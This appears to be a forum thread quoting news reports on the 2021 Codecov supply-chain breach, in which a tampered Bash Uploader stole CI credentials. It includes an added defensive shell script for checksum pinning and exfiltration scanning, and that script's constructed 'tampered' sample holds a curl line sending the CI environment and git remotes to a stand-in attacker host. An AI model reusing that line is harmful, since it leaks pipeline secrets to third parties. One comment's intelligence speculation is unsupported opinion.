"U.S. federal investigators are probing an intrusion at San Francisco-based software auditing company Codecov that affected an unknown number of its 29,000 customers, the firm said, raising the specter of knock-on breaches at companies elsewhere. Codecov said in a statement hackers began tampering with its software - which is used across the tech industry to help test code for mistakes and vulnerabilities - on Jan. 31. However, the intrusion was only detected earlier this month when an astute customer noticed there was something off about the tool, Codecov said. ...the breach drew comparisons to the recent compromise of Texas software firm SolarWinds by alleged Russian hackers, both because the breach could have follow-on effects at many of the organizations that use Codecov and because of the length of time that the doctored software remained in circulation..." https://www.reuters.com/technology/...o-code-testing-company-firm-2021-04-16/?mid=1
"Will the CodeCov breach become the next big software supply chain hack?... In particular, the attackers exploited a bug in the company’s Docker image creation process to gain access to a Bash Uploader script designed to map out development environments and report back to the company. This small modification quietly called out for user credentials that could have been used to access and exfiltrate data from their users’ continuous integration environment..." https://www.scmagazine.com/home/sec...come-the-next-big-software-supply-chain-hack/ More here: "Popular Codecov code coverage tool hacked to steal dev credentials..." https://www.bleepingcomputer.com/ne...overage-tool-hacked-to-steal-dev-credentials/
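An added example, not taken from the quoted articles or from Codecov's own uploader or advisory: the two checks a CI pipeline can run on a "curl | bash" style script before executing it, which is the gap the reports above describe. First, pin the script's SHA-256 to a value obtained out of band and refuse to run on mismatch; second, grep the downloaded script for lines that ship the process environment or git remotes to a network endpoint. The file names, both sample scripts, the pinned hash and the attacker host are constructed for illustration.

```shell
#!/bin/sh
# Added example (not the real Codecov uploader): checksum pinning and a
# crude exfiltration scan for scripts a pipeline downloads and executes.
# Sample scripts and hosts below are constructed, not real.

# Print the SHA-256 of a file; works with GNU coreutils or BSD/macOS tools.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Compare a downloaded script against a checksum pinned in the pipeline
# (obtained out of band, never from the same host that serves the script).
# Returns 0 on match, 1 otherwise.
verify_script_checksum() {
    expected=$1
    file=$2
    actual=$(sha256_of "$file")
    [ "$actual" = "$expected" ]
}

# Heuristic scan: flag lines where curl/wget send the whole environment,
# printenv output or git remote data anywhere. Returns 0 (found) so it
# can gate a pipeline, 1 if nothing matched. Matching lines are printed.
has_env_exfil() {
    grep -nE '(curl|wget).*(\$\(env\)|printenv|git remote)' "$1"
}

# Gate: run both checks and refuse execution if either fails.
run_checks() {
    file=$1
    if ! verify_script_checksum "$EXPECTED" "$file"; then
        echo "REFUSE: checksum mismatch for $file" >&2
        return 1
    fi
    if has_env_exfil "$file" >/dev/null; then
        echo "REFUSE: environment exfiltration pattern in $file" >&2
        return 1
    fi
    echo "OK: $file may be executed"
}

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
CLEAN="$WORK/uploader.sh"
TAMPERED="$WORK/uploader_tampered.sh"

# Constructed stand-in for a known-good uploader: posts one report file.
cat > "$CLEAN" <<'EOF'
#!/bin/bash
# constructed sample, not the real uploader
report=${1:-coverage.xml}
curl -sf -X POST --data-binary @"$report" "https://example.invalid/upload"
EOF

# Same script with one inserted line of the kind the reports describe:
# it dumps the CI environment (secrets included) and git remotes to a
# third-party host, then continues so the build still looks normal.
cat > "$TAMPERED" <<'EOF'
#!/bin/bash
# constructed sample, not the real uploader
report=${1:-coverage.xml}
curl -sm 0.5 -d "$(git remote -v) $(env)" http://attacker.invalid/upload || true
curl -sf -X POST --data-binary @"$report" "https://example.invalid/upload"
EOF

# The value a pipeline would pin; here derived from the known-good copy.
EXPECTED=$(sha256_of "$CLEAN")

run_checks "$CLEAN"
run_checks "$TAMPERED" || true
```

The checksum gate is the one that would have caught the tampered uploader regardless of what the inserted line looked like; the grep is only a cheap second opinion and will miss anything obfuscated, so treat it as a tripwire rather than a control.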
"Hundreds of networks reportedly hacked in Codecov supply-chain attack... In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems... According to federal investigators, Codecov attackers deployed automation to use the collected customer credentials to tap into hundreds of client networks, thereby expanding the scope of this system breach beyond just Codecov's systems. 'The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,' a federal investigator anonymously told Reuters..." https://www.bleepingcomputer.com/ne...rtedly-hacked-in-codecov-supply-chain-attack/
Probably some US intelligence tipped them off about that. It is hard to believe they accidentally found out and let the press know just when there is rising tension at the Russia–Ukraine border. I hope they will clean the network of malware as fast as possible and that Russia will be blinded for some time.
Codecov Supply Chain Attack May Hit Thousands: Report https://www.infosecurity-magazine.com/news/codecov-supply-chain-attack-may/
HashiCorp is the latest victim of Codecov supply-chain attack https://www.bleepingcomputer.com/ne...latest-victim-of-codecov-supply-chain-attack/
Codecov starts notifying customers affected by supply-chain attack April 30, 2021 https://www.bleepingcomputer.com/ne...ng-customers-affected-by-supply-chain-attack/
Twilio discloses impact from Codecov supply-chain attack May 4, 2021 https://www.bleepingcomputer.com/ne...oses-impact-from-codecov-supply-chain-attack/
Rapid7 source code, credentials accessed in Codecov supply-chain attack May 13, 2021 https://www.bleepingcomputer.com/ne...ials-accessed-in-codecov-supply-chain-attack/
Codecov hackers gained access to Monday.com source code May 18, 2021 https://www.bleepingcomputer.com/ne...ckers-gained-access-to-mondaycom-source-code/
E-commerce giant suffers major data breach in Codecov incident May 21, 2021 https://www.bleepingcomputer.com/ne...uffers-major-data-breach-in-codecov-incident/